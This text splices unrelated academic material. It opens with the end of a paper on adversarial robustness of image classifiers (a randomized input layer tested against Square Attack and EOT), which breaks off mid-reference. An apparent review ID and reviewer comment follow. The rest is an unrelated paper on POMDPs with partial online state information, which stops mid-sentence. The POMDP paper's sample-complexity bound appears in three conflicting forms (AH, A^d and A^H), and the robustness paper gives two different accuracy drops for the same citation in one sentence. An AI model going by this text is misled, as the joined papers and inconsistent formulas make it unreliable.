(Singh et al., 2023) by a large margin in almost all tests. To be more solid, we also compare with other methods of more sophisticated architectures, including Swin-L and ConvNeXt-L in (Liu et al., 2023b), only slightly behind on Square Attack \(l_{\infty}-\epsilon=4/255\) and \(l_2-\epsilon=2\). Some of the example feature maps in our input layers are listed in Figure 2. The input \(x\), the sampling matrix \(\hat{x}\), and the final output \(y\) are demonstrated in three rows. Our specially designed input layer changes the input \(x\) into \(y\) that are extremely squeezed. On the one hand, it poses a great challenge to the network, while on the other hand, it improves the robustness. Regarding EOT tests, the negative impacts on robust accuracy are almost negligible for \(l_1\) and \(l_2\), while for \(l_{\infty}\), there is a relatively high drop. However, we stress again here that in fact, every defense is weak given sufficient computational resources. As shown in Table 6, we increase a query limit of Square Attack from 5K used in AutoAttack to 50K denoted as Enhanced-Square, and there are up to 12% decrease in robust accuracy for Singh et al. (2023), 9% for Singh et al. (2023). Interestingly, because of randomness and the last-move strategy, ours stands up, sometimes even better than clean one. Due to resource constraints, only 500 images are evaluated. 6 DISCUSSION Our approach is efficient and effective; however, one may raise a big concern with respect to the obfuscated gradient or adaptive attack. Since the work of Athalye et al. (2018), the adversarial defense community is conservative about the validity of claims of effective defenses. However, Athalye et al. (2018) only investigates the attack strategies for the type of seen attacks without taking into account the computational load of the attacker, which is not sufficient. For example, adversarial training with \(l_{\infty}=8/255\) is usually evaluated with \(l_{\infty}=8/255\). In practice, the attack should not be confined to only launching the attack of the type that the defender has seen before, and the computation resources should be restricted to, for example, a certain number of queries; otherwise, the defender can reject the attack that takes too much time through other security measures. In fact, the unseen attacks are much easier to break the defense than hand-crafted and sophisticated adaptive attacks in Athalye et al. (2018), so they should come first. According to our thorough experiments, ours achieves the state of the art in this regard. Almost all previous approaches generalize poorly to unseen attacks. The other big question may be why this approach can be so robust. The key motivation is that we try to unleash the great potential of deep networks unusually. The input features are squeezed randomly, so the networks have to identify some robust features to get high clean accuracy; and impacts made by attacks can be minimized. There are some limitations of this approach. Firstly, clean accuracy is lower than the state of the art. Secondly, as the sampling matrix $\hat{x}$ relies on the $3 \times 3$ convolution of input, it might be misled by recently proposed occlusion attack (Duan et al., 2023). Thirdly, ours is only verified by experiments, and there is no theoretical robustness guarantee. 7 SUMMARY In this paper, we present a simple approach that only uses standard training with clean images, and achieves the state of the art robust accuracy on unseen $l_1$, $l_2$, and $l_\infty$-attacks at one time. This method is verified through CIFAR-10 and ImageNet dataset. In the future work, we will improve the clean accuracy and take care of the occlusion attack. Theoretical analysis is also needed to better understand why it works so well. REFERENCES Maksym Andriushchenko, Francesco Croce, Nicolas Flammarion, and Matthias Hein. Square attack: A query-efficient black-box adversarial attack via random search. In Andrea Vedaldi, Horst Bischof, Thomas Brox, and Jan-Michael Frahm (eds.), Computer Vision - ECCV 2020 - 16th European Conference, Glasgow, UK, August 23-28, 2020, Proceedings, Part XXIII, volume 12368 of Lecture Notes in Computer Science, pp. 484–501. Springer, 2020. doi: 10.1007/978-3-030-58592-1\textbackslash 29. URL https://doi.org/10.1007/978-3-030-58592-1\textbackslash 29 Anish Athalye, Nicholas Carlini, and David A. Wagner. Obfuscated gradients give a false sense of security: Circumventing defenses to adversarial examples. In Jennifer G. Dy and Andreas Krause (eds.), Proceedings of the 35th International Conference on Machine Learning, ICML 2018, Stockholmsmässan, Stockholm, Sweden, July 10-15, 2018, volume 80 of Proceedings of Machine Learning Research, pp. 274–283. PMLR, 2018. URL http://proceedings.mlr.press/v80/athalye18a.html Yang Bai, Yuyuan Zeng, Yong Jiang, Shu-Tao Xia, Xingjun Ma, and Yisen Wang. Improving adversarial robustness via channel-wise activation suppressing. In 9th International Conference on Learning Representations, ICLR 2021, Virtual Event, Austria, May 3-7, 2021. OpenReview.net, 2021. URL https://openreview.net/forum?id=zQTezqCcTNx Zhuotong Chen, Qianxiao Li, and Zheng Zhang. Towards robust neural networks via close-loop control. In 9th International Conference on Learning Representations, ICLR 2021, Virtual Event, Austria, May 3-7, 2021. OpenReview.net, 2021. URL https://openreview.net/forum?id=2AL06y9cDE- Jeremy M. Cohen, Elan Rosenfeld, and J. Zico Kolter. Certified adversarial robustness via randomized smoothing. In Kamalika Chaudhuri and Ruslan Salakhutdinov (eds.), Proceedings of the 36th International Conference on Machine Learning, ICML 2019, 9-15 June 2019, Long Beach, California, USA, volume 97 of Proceedings of Machine Learning Research, pp. 1310–1320. PMLR, 2019. URL http://proceedings.mlr.press/v97/cohen19c.html Francesco Croce and Matthias Hein. Minimally distorted adversarial examples with a fast adaptive boundary attack. Francesco Croce and Matthias Hein. Reliable evaluation of adversarial robustness with an ensemble of diverse parameter-free attacks. In Proceedings of the 37th International Conference on Machine Learning, ICML 2020, 13-18 July 2020, Virtual Event, volume 119 of Proceedings of Machine Learning Research, pp. 2206–2216. PMLR, 2020. URL http://proceedings.mlr.press/v119/croce20b.html Francesco Croce, Maksym Andriushchenko, Vikash Sehwag, Edoardo Debenedetti, Nicolas Flammarion, Mung Chiang, Prateek Mittal, and Matthias Hein. Robustbench: a standardized adversarial robustness benchmark. In Joaquin Vanschoren and Sai-Kit Yeung (eds.), Francesco Croce, Sven Gowal, Thomas Brunner, Evan Shelhamer, Matthias Hein, and A. Taylan Cemgil. Evaluating the adversarial robustness of adaptive test-time defenses. In Kamalika Chaudhuri, Stefanie Jegelka, Le Song, Csaba Szepesvári, Gang Niu, and Sivan Sabato (eds.), International Conference on Machine Learning, ICML 2022, 17-23 July 2022, Baltimore, Maryland, USA, volume 162 of Proceedings of Machine Learning Research, pp. 4421–4435. PMLR, 2022. URL https://proceedings.mlr.press/v162/croce22a.html. Jiequan Cui, Shu Liu, Liwei Wang, and Jiaya Jia. Learnable boundary guided adversarial training. In 2021 IEEE/CVF International Conference on Computer Vision, ICCV 2021, Montreal, QC, Canada, October 10-17, 2021, pp. 15701–15710. IEEE, 2021. doi: 10.1109/ICCV48922.2021.01543. Sihui Dai, Saeed Mahloujifar, and Prateek Mittal. Parameterizing activation functions for adversarial robustness. In 43rd IEEE Security and Privacy, SP Workshops 2022, San Francisco, CA, USA, May 22-26, 2022, pp. 80–87. IEEE, 2022. doi: 10.1109/SPW54247.2022.9833884. Ranjie Duan, Yuefeng Chen, Yao Zhu, Xiaojun Jia, Rong Zhang, and Hui Xue. Inequality phenomenon in $l_\infty$-adversarial training, and its unrealized threats. In The Eleventh International Conference on Learning Representations, ICLR 2023, Kigali, Rwanda, May 1-5, 2023. OpenReview.net, 2023. URL https://openreview.net/pdf?id=4t9g35BxGr. Sven Gowal, Chongli Qin, Jonathan Uesato, Timothy A. Mann, and Pushmeet Kohli. Uncovering the limits of adversarial training against norm-bounded adversarial examples. CoRR, abs/2010.03593, 2020. URL https://arxiv.org/abs/2010.03593. Sven Gowal, Sylvestre-Alvise Rebuffi, Olivia Wiles, Florian Stimberg, Dan Andrei Calian, and Timothy A. Mann. Improving robustness using generated data. In Marc’Aurelio Ranzato, Alina Beygelzimer, Yann N. Dauphin, Percy Liang, and Jennifer Wortman Vaughan (eds.), Advances in Neural Information Processing Systems 34: Annual Conference on Neural Information Processing Systems 2021, NeurIPS 2021, December 6-14, 2021, virtual, pp. 4218–4233, 2021. URL https://proceedings.neurips.cc/paper/2021/hash/21ca6d0cf2f25c4dbb53d8dc0b679c32-Abstract.html. Chuan Guo, Mayank Rana, Moustapha Cissé, and Laurens van der Maaten. Countering adversarial images using input transformations. In 6th International Conference on Learning Representations, ICLR 2018, Vancouver, BC, Canada, April 30 - May 3, 2018, Conference Track Proceedings. OpenReview.net, 2018. URL https://openreview.net/forum?id=SyJ7ClWCb. Dan Hendrycks, Kimin Lee, and Mantas Mazeika. Using pre-training can improve model robustness and uncertainty. In Kamalika Chaudhuri and Ruslan Salakhutdinov (eds.), Proceedings of the 36th International Conference on Machine Learning, ICML 2019, 9-15 June 2019, Long Beach, California, USA, volume 97 of Proceedings of Machine Learning Research, pp. 2712–2721. PMLR, 2019. URL http://proceedings.mlr.press/v97/hendrycks19a.html. Hanxun Huang, Yisen Wang, Sarah M. Erfani, Quanquan Gu, James Bailey, and Xingjun Ma. Exploring architectural ingredients of adversarially robust deep neural networks. In Marc’Aurelio Ranzato, Alina Beygelzimer, Yann N. Dauphin, Percy Liang, and Jennifer Wortman Vaughan (eds.), Advances in Neural Information Processing Systems 34: Annual Conference on Neural Information Processing Systems 2021, NeurIPS 2021, December 6-14, 2021, virtual, pp. 5545–5559, 2021. URL https://proceedings.neurips.cc/paper/2021/hash/2bd7f907b7f5b6bbd91822c0c7b835f6-Abstract.html. Andrew Ilyas, Shibani Santurkar, Dimitris Tsipras, Logan Engstrom, Brandon Tran, and Aleksander Madry. Adversarial examples are not bugs, they are features. In Hanna M. Wallach, Hugo Larochelle, Alina Beygelzimer, Florence d’Alché-Buc, Emily B. Fox, and Roman Garnett (eds.), Advances in Neural Information Processing Systems 32: Annual Conference on Neural Information Processing Systems 2019, NeurIPS 2019, 8-14 December 2019,
Q00CO1Tm6M
As in previous work, the OSI in the hindsight is common some applications, such as data center scheduling, where the state is revealed after the action is take (so the effect of the action can be observed), However, the query model in this paper allows the agent to query part of the state before the action is taken. Even the motivating examples (e.g., the autonomous driving) seems to advocate the former setup, which reveals the state after taking actions. Although the conclusions of the paper may still hold in the case that the query happens after taking actions, it is appreciated to discuss about the model that is better aligned with the real world.
THEORETICAL HARDNESS AND TRACTABILITY OF POMDPs IN RL WITH PARTIAL ONLINE STATE INFORMATION Anonymous authors Paper under double-blind review ABSTRACT Partially observable Markov decision processes (POMDPs) have been widely applied to capture many real-world applications. However, existing theoretical results have shown that learning in general POMDPs could be intractable, where the main challenge lies in the lack of latent state information. A key fundamental question here is how much online state information (OSI) is sufficient to achieve tractability. In this paper, we establish a lower bound that reveals a surprising hardness result: unless we have full OSI, we need an exponentially scaling sample complexity to obtain an $\epsilon$-optimal policy solution for POMDPs. Nonetheless, inspired by the key insights in our lower bound design, we find that there exist important tractable classes of POMDPs even with only partial OSI. In particular, for two novel classes of POMDPs with partial OSI, we provide new algorithms that are proved to be near-optimal by establishing new regret upper and lower bounds. 1 INTRODUCTION Partially observable Markov decision processes (POMDPs) model reinforcement learning (RL) systems, where an agent interacts with the environment sequentially without observing the latent state. In these systems, the agent only has access to a noisy observation randomly generated by the latent state via an emission probability distribution. The goal of the agent is to achieve a large expected cumulative reward. POMDPs generalize the classic (fully observable) MDPs, and have been applied to capture many real-world applications. For example, an AI-trained robot often receives only noisy observations of the environment from its sensors due to sensory noise [Akkaya et al., 2019]; autonomous cars typically do not have a global view of traffic conditions due to their limited reception [Levinson et al., 2011]. Similar scenarios can occur in games [Berner et al., 2019], healthcare [Hauskrecht & Fraser, 2000], recommendation systems [Li et al., 2010], economic systems [Zheng et al., 2020], and so forth. Existing information-theoretical results have shown that learning in general POMDPs is intractable and PSPACE-complete [Papadimitriou & Tsitsiklis, 1987; Mundhenk et al., 2000; Vlassis et al., 2012; Krishnamurthy et al., 2016]. This is in contrast to classic MDPs, where many efficient algorithms have been developed, e.g., Azar et al. [2017]; Jin et al. [2018]; Agarwal et al. [2019]; Jin et al. [2020]; Ayoub et al. [2020]; Xie et al. [2020]; Foster et al. [2021]; Jin et al. [2022]; Bai et al. [2019]; Cai et al. [2020], among others. The challenge of POMDPs mainly lies in the lack of latent state information, such that the Markov property that simplifies classic MDPs does not hold any more. Despite the intractability in general POMDPs, recent studies have identified some tractable classes of POMDPs, for which efficient algorithms with polynomial dependency (on the number of actions $A$, number of states $S$ and episode length $H$) can be developed, e.g., $m$-step decodable POMDPs [Efroni et al., 2022], reactive POMDPs [Jiang et al., 2017], POMDPs with block MDPs [Zhang et al., 2022] or latent MDPs [Kwon et al., 2021], and POMDPs with reachability [Xiong et al., 2022] or observability [Golowich et al., 2022]. Due to page limits, we relegate more discussions about related work in Appendix A. One prominent tractable class is identified based on weakly revealing conditions [Liu et al., 2022; 2023] or predictive state representations [Chen et al., 2022a; Zhong et al., 2022]. However, these conditions may not hold in practical cases, e.g., resource allocation [Sinclair et al., 2023; Lee et al., 2023] and robotics [Pinto et al., 2018; Lee et al., 2023]. Moreover, the regret obtained there can be arbitrarily large if the emission probability differences of different underlying states are small. To circumvent the dependency and strong assumptions on the emission probability measure, recent work has exploited hindsight state information (Sinclair et al., 2023; Lee et al., 2023), where full state information is revealed only at the end of each episode. This line of work is motivated by the fact that, although the precise information about the true underlying state is not available before the agent takes an action, some information may become available in hindsight. However, these studies have assumed full hindsight state information. Thus, a natural question one may ask is: what would happen if the state information was not fully revealed at the end of the episode? In fact, this can happen often in practice. For example, in classic wireless channel scheduling formulated by POMDPs (Zhao et al., 2007; Chen et al., 2008; Ouyang et al., 2015), only the feedback about the scheduled or sensed channels will be available to the users; in autonomous driving (Levinson et al., 2011; Pinto et al., 2018; Jennings & Figliozzi, 2019), only the condition of the located or probed path will be known to the car. Further, it can be trivially shown (based on the existing lower bounds in Krishnamurthy et al., 2016; Liu et al., 2022) that such a situation becomes intractable. This thus motivates us to investigate the value of partial (i.e., not full) state information inside (i.e., not at the end of) the episode. We call this partial “Online State Information” (OSI). In order to model such partial OSI more concretely, we provide a novel formulation. Specifically, we consider vector-structured state (Jin et al., 2020; Agarwal et al., 2019; Ayoub et al., 2020), which are motivated by the aforementioned practical examples. In other words, the state is given by a $d$-dimension vector with each element representing an abstract feature, such as the feedback about a wireless channel (Zhao et al., 2007) and the condition of a path in autonomous driving (Jennings & Figliozzi, 2019). Partial OSI means that at each step of an episode, a subset of $\tilde{d}$ ($1 \leq \tilde{d} < d$) elements in the state-vector will be revealed to the agent after her query. Note that such a model allows the agent to actively query partial OSI for different elements at different times. This prevents the trivial case, where one state-element cannot be known throughout the process (so that the problem becomes equivalent to a POMDP problem with that specific unknown state-element being the hidden state). Therefore, the key fundamental open questions are: **With such partial OSI, can POMDPs be tractable/learnable? If not, are there any specific classes of POMDPs that can be tractable under partial OSI?** **Our Contributions:** In this paper, we study the important problem of POMDPs with partial OSI and provide in-depth answers to the above key open questions. First, we establish a lower bound in Theorem 1 that reveals a surprising hardness result: unless we have full OSI, we need an exponentially scaling sample complexity of $\Omega(\frac{AH}{\epsilon^2})$ to find an $\epsilon$-optimal policy for POMDPs, where $A$ and $H$ are the number of actions and episode length, respectively. This result indicates a sharp gap between POMDPs with partial OSI and those with full OSI or full hindsight state information (Lee et al., 2023). This may seem somewhat counter-intuitive, because by combining multiple partial OSI from different steps, one may construct full information of a state, and thus enjoy similar performance as that with full OSI. In fact, in Sec. 3, we design a hard instance with special state representations and transitions, under which partial OSI at each step and even a combination of partial OSI from different steps are not sufficient to achieve an $\epsilon$-optimal solution with polynomial complexity. Nonetheless, inspired by the key insights in our design of the hard instance for establishing the lower bound, we identify two intriguing tractable classes of POMDPs with only partial OSI. Second, inspired by our state-transition design for the lower bound, in Sec. 4, we identify a novel tractable class of POMDPs with partial OSI, where the transitions of the sub-states (i.e., elements) in the state-vector are independent of each other. This class is motivated by many practical examples ranging from wireless scheduling (Zhao et al., 2007; Chen et al., 2008; Ouyang et al., 2015) to Martian rock-sampling (Levinson et al., 2011) and autonomous driving (Pinto et al., 2018; Jennings & Figliozzi, 2019). We provide two new near-optimal algorithms for this class. The regrets of both algorithms achieve a polynomial dependency on all parameters (please see Theorem 2 and Theorem 6). In addition, the regret of our second algorithm for the case with $\tilde{d} > 1$ shows that the regret can be further reduced as $\tilde{d}$ increases. To achieve such results, our algorithm design includes important novel ideas to determine (i) which partial OSI is more informative, and (ii) the action policy that relies on the queried partial OSI at each step. These also require new technical developments in the regret analysis (see Appendix E and Appendix F). Third, inspired by our state-representation design for the lower bound, in Sec. 5 we identify another novel tractable class of POMDPs with partial OSI, where additional noisy observations for the sub-states in the state-vector that are not actively queried are available. We provide a new algorithm with a near-optimal regret in Theorem 3. Our regret analysis involves a non-trivial generalization of the observable operator method (Jaeger [2000]; Liu et al. [2022]) to handle the case with partial OSI of different sub-states that are actively queried by the agent. In addition, we provide a new regret lower-bound in Theorem 4 that demonstrates the near-optimality of the regret that we achieve. 2 PROBLEM FORMULATION In this section, we first introduce the general episodic partially observable Markov decision process (POMDP) for clarity, which is intractable in the worst case. Then, we introduce the POMDP setting with partial online state information (OSI) that we study in this paper. 2.1 THE GENERAL EPISODIC POMDP Episodic POMDPs are usually modelled by a tuple \( M = (S, A, O, H, \Delta_1, P, \Omega, r) \) (Liu et al., 2022; Chen et al., 2022a, b; Cai et al., 2022), where \( S, A \) and \( O \) denote the state space with \( S \) states, the action space with \( A \) actions and the observation space with \( O \) observations, respectively; \( H \) denotes the number of steps in an episode; \( \Delta_1 : S \rightarrow [0, 1] \) denotes a probability measure supported on the state space \( S \) and determines the randomness of the initial state at the beginning of an episode; \( P = \{P_h : S \times S \times A \rightarrow [0, 1]\}_{h=1}^{H-1} \) and \( \Omega = \{\Omega_h : O \times S \rightarrow [0, 1]\}_{h=1}^{H} \) denote the unknown transition and emission probability measures, respectively; and \( r = \{r_h : O \times A \rightarrow [0, 1]\}_{h=1}^{H} \) denotes the known reward function. Specifically, an online agent interacts with the environment in \( K \) episodes. At each step \( h = 1, \ldots, H \) of an episode, the agent receives a noisy observation \( o_h^k \) that is generated according to the emission probability \( \Omega_h(\cdot | s_h^k) \), where \( s_h^k \) is the unknown true latent state. Next, the agent takes an action \( a_h^k \) and receives the reward \( r_h(o_h^k, a_h^k) \). Then, the environment transits to the next state \( s_{h+1}^k \), which is drawn according to the transition probability \( P_h(\cdot | s_h^k, a_h^k) \). The goal of the agent is to find a near-optimal policy that achieves an expected cumulative reward close to that of the optimal policy. Please see Fig. 1a for a sketch of one step. Due to the lack of latent state information, the observation is non-Markovian and the policy needs to maintain memory. 2.2 THE EPISODIC POMDP WITH PARTIAL OSI As discussed in Sec. 1, we make the first effort to investigate the impact of partial OSI on POMDPs in this paper. We provide a formulation for studying POMDPs with partial OSI. Specifically, we consider the vector-structured states (Jin et al., 2020; Ayoub et al., 2020; Agarwal et al., 2019). Each state \( s \) is represented by a \( d \)-dimension feature vector \( \phi(s) = [\phi_1(s), ..., \phi_d(s)]^T \in \mathbb{S}^d \), where \( \mathbb{S} \) is the universal set of the values for each element/sub-state in \( \phi(s) \), and \( [\cdot]^T \) denotes the transpose of a vector. We use \( |\mathbb{S}| \) to denote the cardinality of the set \( \mathbb{S} \). Then, at each step \( h = 1, \ldots, H \) of an episode \( k = 1, \ldots, K \), the agent interacts with the environment as follows (please see Fig. 1b for a sketch of one step of the POMDP with partial OSI): (Step-i) The agent actively queries a subset of \( \tilde{d} \) (where \( 1 \leq \tilde{d} < d \)) sub-states (let \( \hat{s}_h^k \) denote the indices of these queried sub-states); (Step-ii) the partial OSI, i.e., the precise information of the queried sub-states \( \{\phi_i(s)\}_{i \in \hat{i}_h} \), is revealed to the agent; (Step-iii) the agent takes an action \( a^k_h \) and receives the reward \( r_h(\phi_{\hat{i}_h}(s^k_h), a^k_h) \), where the reward \( r_h : \hat{S} \times A \rightarrow [0, 1] \) is a function of the partial OSI and \( \hat{S} \triangleq \{\phi_i(s) : |\hat{i}| = \hat{d}, s \in S\} \) is the sub-state space for any union of \( \hat{d} \) sub-states.; (Step-iv) the environment transits to the next state \( s^{k+1}_h \). This model is motivated by various practical scenarios, e.g., wireless scheduling (Chen et al., 2008; Ouyang et al., 2015), autonomous driving (Levinson et al., 2011; Pinto et al., 2018; Jennings & Figliozzi, 2019), robotics (Akkaya et al., 2019; Lee et al., 2023; Silver & Veness, 2010) and healthcare (Hauskrecht & Fraser, 2000). Below, we elaborate on two important motivating examples. **Motivating example 1:** In an autonomous delivery system (Jennings & Figliozzi, 2019), in order to deliver the product to the destination, a robot explores multiple paths and chooses one path at each intersection. Here, each sub-state \( \phi_i(s) \) of \( s \) represents the condition, e.g., traffic intensity, of one path. At each step, the robot agent first actively queries and observes the condition of several paths, i.e., the partial OSI. However, due to delay requirements, unknown dynamics in the environment, and occlusion, the precise conditions of other paths may not be available to the robot. Then, she chooses one path to follow, i.e., the action that will incur a reward. **Motivating example 2:** Consider a cognitive MAC (medium access control) system (Ouyang et al., 2015), where a secondary user, i.e., an agent, wishes to search for spectrum-access opportunities. Here, the state \( s \) characterizes the conditions of multiple channels available for an agent to use. Sub-state \( \phi_i(s) \) represents the condition, e.g., busy or idle, of the \( i \)-th channel. At each step, the agent first probes the conditions of a number of channels. After this query, the conditions of the sensed channels will be observed, i.e., the partial OSI. However, due to energy constraints and latency requirements, the agent cannot sense all the channels. Then, she transfers the packets using one channel, i.e., the action that will incur a reward. ### 2.3 Performance Metric In POMDPs with partial OSI, at each step \( h \) of episode \( k \), the feedback revealed to the agent is \( \Phi^k_h = (\phi_{\hat{i}_h}(s^k_h), a^k_1, ..., \phi_{\hat{i}_h}(s^{k-1}_h), a^{k-1}_h) \). We use \( \tilde{\Phi}_h \) to denote the feedback space of \( \Phi^k_h \) before the partial OSI for step \( h \) is revealed, and use \( \bar{\Phi}_h = \{\tilde{\Phi}_h \cup \{\phi_{\hat{i}_h}(s_h)\}_{\hat{i}_h}\} \) to denote the feedback space after the partial OSI for step \( h \) has been revealed. Then, the query \( \hat{i}_h^k \) is made according to a **query policy** \( \pi^k_{q,h} : \tilde{\Phi}_h \rightarrow \hat{\Delta}_h(\{\hat{i}\}|\hat{d}) \), which maps from \( \tilde{\Phi}_h \) to a conditional probability measure \( \hat{\Delta}_h(\{\hat{i}\}|\hat{d}) \) supported on the query space \( \{\hat{i} : |\hat{i}| = \hat{d}\} \). Next, after receiving the partial OSI \( \phi_{\hat{i}_h}(s^k_h) \), the action \( a^k_h \) is taken according to an **action policy** \( \pi^k_{a,h} : \tilde{\Phi}_h \rightarrow \hat{\Delta}_h(A) \), which maps from \( \tilde{\Phi}_h \) to a probability measure \( \hat{\Delta}_h(A) \) supported on the action space \( A \). We use the \( V \)-value \( V^{\pi^k} \triangleq \mathbb{E}[\pi^k_{q,h}, \pi^k_{a,h}, \hat{\Delta}_h] \sum_{h=1}^{H} r_h(\phi_{\hat{i}_h}(s^k_h), a^k_h)] \) to denote the expected total reward in episode \( k \) by following \( \pi^k = \{\pi^k_{q,h}\}_{h=1}^{H} \) and \( \pi^k_a = \{\pi^k_{a,h}\}_{h=1}^{H} \), where \( \pi^k = (\pi^k_q, \pi^k_a) \). We take the regret as the performance metric, which is the difference between the expected cumulative reward using the online joint policies \( \pi^{1..K} \) and that of using the optimal policy, i.e., \[ \text{Reg}^{\pi^{1..K}}(K) \triangleq \sum_{k=1}^{K} \left[ V^* - V^{\pi^k} \right], \] where \( V^* \triangleq \sup_{\pi} V^{\pi} \) denotes the expected total reward of the optimal policy in an episode. The goal of the online agent is to find a policy that achieves a sub-linear regret with respect to \( K \). Hence, the main challenge and new difficulty here is how to design the query policy \( \pi^k_q \), such that an action policy \( \pi^k_a \) can also be intelligently developed to achieve a near-optimal regret. ### 3 Perils of Not Having Full OSI: A New Lower Bound In this section, we answer the long-standing open question: whether POMDPs with online state information are tractable without full OSI? In Theorem 1 below, we establish a lower bound that reveals a surprising hardness result: unless we have full OSI, we need an exponential sample complexity to find an \( \epsilon \)-optimal policy for POMDPs, where a policy \( \pi \) is \( \epsilon \)-optimal if \( V^{\pi} \geq V^* - \epsilon \). --- 1Recall that \( \phi_{\hat{i}_h}(s^k_h) \in \tilde{\Phi}_h \). Thus, the action policy \( \pi^k_{a,h} \) relies on the output of the query policy \( \pi^k_{q,h} \). Figure 2: A hard instance for developing the lower bound in POMDPs with only partial OSI. States \( s(1), s(2), s(3) \) and \( s(4) \) are represented by solid circles, dashed circles, solid squares and dashed squares, respectively. Ber(1/2) represents the Bernoulli distribution with mean 1/2. **Theorem 1. (Intractability for not having full OSI)** For POMDPs with only partial online state information introduced in Sec. 2.2, there exists hard instances, such that with a probability \( p \geq 1/3 \), any algorithm needs at least \( \Omega(A^d/\epsilon^2) \) samples to find an \( \epsilon \)-optimal policy. Theorem 1 demonstrates the hardness of POMDPs without full OSI: a polynomially scaling sample complexity \( \text{Poly}(A,H,S,K) \) is impossible. The result in Theorem 1 may seem counter-intuitive, because by combining multiple partial OSI collected from different steps, one may construct full observations and then enjoy similar performance as that with full OSI. Below, we design an important hard instance and provide our key proof ideas of Theorem 1, which shows why this is not true. **Remark 1.** The intractability result in Theorem 1 still holds even if in addition to partial OSI, there exist noisy observations (please see our discussion in Sec. 5). This is because we can construct a hard instance directly based on the one that we construct in this section, while letting the emission probabilities of the additional noisy observations to be exactly the same for all underlying states, such that the additional observations do not provide any useful statistical information. ### 3.1 Our Key Proof Ideas for Theorem 1 For simplicity, we focus on the simpler case with \( d = 2 \) and \( \tilde{d} = 1 \), which makes it easier to understand our key proof ideas. Please see Appendix C for the complete proof. The important parts in our proof are to design special state representations and transitions, such that partial OSI cannot help the learner to improve her statistical knowledge about the true underlying state. Towards this end, we construct a hard instance with four states, i.e., \( s(1), s(2), s(3) \) and \( s(4) \) (see Fig. 2). **Idea I (Special state representations):** Our first key idea is to construct special state representations, such that by only observing \( \tilde{d} = 1 \) sub-state, it is still impossible for the learner to infer the true latent state. Specifically, we let \( \tilde{\phi}(s(1)) = [x_1, x_2]^T \), \( \tilde{\phi}(s(2)) = [x_3, x_4]^T \), \( \tilde{\phi}(s(3)) = [x_1, x_4]^T \) and \( \tilde{\phi}(s(4)) = [x_3, x_2]^T \), where \( x_1, ..., x_4 \) are sub-states (see Fig. 2). We introduce the high-level reason for constructing the state representations in this way. Let us consider states \( s(1) \) and \( s(2) \) as a group of states, and we call it group \( a \). Similarly, we call states \( s(3) \) and \( s(4) \) group \( b \). Under our construction of the state representation, each state in group \( a \) (i.e., \( s(1) \) and \( s(2) \)) must contain a same sub-state as that in each state of group \( b \) (i.e., \( s(3) \) and \( s(4) \)). For example, the first sub-states of both state \( s(1) \) and state \( s(3) \) are \( x_1 \). This means that, by only querying \( \phi_1(s) = x_1 \), the learner cannot know whether she is in a state from group \( a \) or group \( b \). As another example, the second sub-states of both state \( s(1) \) and state \( s(4) \) are \( x_2 \). This means that, by only querying \( \phi_2(s) = x_2 \), the learner cannot know whether she is in a state from group \( a \) or group \( b \). As a result, if (i) there is only one specific action sequence that guarantees the learner to be in group \( a \), and (ii) group \( a \) generates a larger reward, then intuitively the learner has to constantly keep trying all exponential number of possible action sequences to figure this out with high probability. However, as we mentioned before, another question still remains: whether a combination of the partial OSI from different steps would be enough? To answer this question, we construct special state transitions using our idea II below. Together with the state representation that we construct above, this state transition causes difficulty for the learner, even when multiple partial OSI are combined. Idea II (Special state transitions): Our second key idea is to construct special state transitions, such that even by combining the partial OSI from different steps, it is still impossible for the learner to infer the true latent state. Specifically, in each episode, the learner starts from state \( s_1 = s(1) \) (see Fig. 2). At step \( h = 1 \), (i) if action \( a(1) \) is chosen, the state will transition to \( s(1) \) and \( s(2) \) with the same probability (wsp); (ii) if action \( a(2) \) is chosen, the state will transition to \( s(3) \) and \( s(4) \) wsp. At step \( h = 2 \), (i) if action \( a(1) \) is chosen, both states \( s(1) \) and \( s(2) \) will transition to \( s(3) \) and \( s(4) \) wsp; (ii) if action \( a(2) \) is chosen, they will transition to \( s(1) \) and \( s(2) \) wsp. At step \( h = 3 \), (i) if action \( a(1) \) is chosen, states \( s(1) \) and \( s(2) \) will transition to \( s(1) \) and \( s(2) \) wsp; (ii) if action \( a(2) \) is chosen, they will transition to \( s(3) \) and \( s(4) \) wsp. For states \( s(3) \) and \( s(4) \) at step \( h = 2 \) and \( h = 3 \), no matter which action is chosen, the states will transition to \( s(3) \) and \( s(4) \) wsp. Then, together with the state representation that we constructed, even when the partial OSI about the first and second sub-states from different steps are combined, such a construction for the state transition still prevents the learner from knowing which group of states she is in. For example, at step \( h = 1 \) of two episodes, the learner can keep taking action \( a(1) \) and query the first and second sub-states one-by-one. Then, the partial OSI at step \( h = 2 \) could be \( \phi_1(s^k_2) = x_1 \) (i.e., the first sub-state of \( s(1) \)) and \( \phi_2(s^{k+1}_2) = x_4 \) (i.e., the second sub-state of \( s(2) \)). However, note that the first and second sub-states of \( s(3) \) are also \( x_1 \) and \( x_4 \). Thus, such a combination of partial OSI (i.e., \( \phi_1(s^k_2) = x_1 \) and \( \phi_2(s^{k+1}_2) = x_4 \)) is not powerful enough for the learner to distinguish whether she is visiting \( s(1) \) and \( s(2) \) or she is simply visiting \( s(3) \). Similar issues occurs at other steps. Idea III (Special reward functions): Up to here, we can see that only with partial OSI, the learner cannot improve her statistical knowledge about the true underlying states. Thus, she can only rely on the statistical relation between the sequence of actions that is chosen and the reward that is received. Hence, to create difficulties, we let (i) the rewards \( r_h \) at steps \( h = 1, 2, 3 \) are all 0; (ii) if the final state is in group \( b \), i.e., \( s(3) \) or \( s(4) \), the reward at step \( h = 4 \) follows Bernoulli distribution with mean \( \frac{1}{2} \); (iii) if the final state is in group \( a \), i.e., \( s(1) \) or \( s(2) \), the reward at step \( h = 4 \) follows Bernoulli distribution with a slightly higher mean equal to \( \frac{1}{2} + \epsilon \). In this way, the optimal policy will take action sequence \((a(1), a(2), a(1))\) for all episodes, so that she can remain in group \( a \) and enjoy a larger expected total reward in every episode equal to \( \frac{1}{2} + \epsilon \). In contrast, the online learner has to try every possible sequence of actions to figure out which sequence provides larger reward with high probability. Since there are \( A^H \) number of possible action sequences, according to the Hoeffding’s inequality, we can show that the sample complexity for achieving an \( \epsilon \)-optimal policy is \( \Omega(A^H/\epsilon^2) \). 4 OPTIMALITY UNDER PARTIAL OSI AND INDEPENDENT SUB-STATES While learning in the world of general POMDPs with partial OSI is intractable, inspired by the key insights in our lower-bound design, we identify two rich classes of POMDPs with partial OSI that are tractable, for which we provide new near-optimal algorithms. We leave other potential learnable classes as future work. The tractable class that we study in this section is as follows. Class 1. (POMDPs with partial OSI and independent sub-states) At each step, (step-i) the agent actively selects sub-states \( \tilde{i}^k_h \) to 